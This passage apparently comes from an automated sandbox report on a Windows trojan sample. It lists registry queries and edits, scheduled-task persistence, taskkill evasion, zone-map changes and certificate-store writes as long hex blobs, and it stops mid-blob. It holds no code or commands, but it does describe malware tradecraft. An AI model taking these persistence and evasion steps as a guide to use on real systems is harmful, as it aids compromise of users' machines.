Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision C:\Windows\SYSTEM32\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\syswow64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\SYSTEM32\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SYSTEM32\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\SYSTEM32\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SYSTEM32\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz C:\Windows\SYSTEM32\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\syswow64\rundll32.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\SYSTEM32\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Windows\SYSTEM32\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString C:\Windows\syswow64\rundll32.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1384669652-2270756765-572751751-1000_Classes\Local Settings C:\Windows\syswow64\rundll32.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b90f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e404000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c00000001000000040000000010000004000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a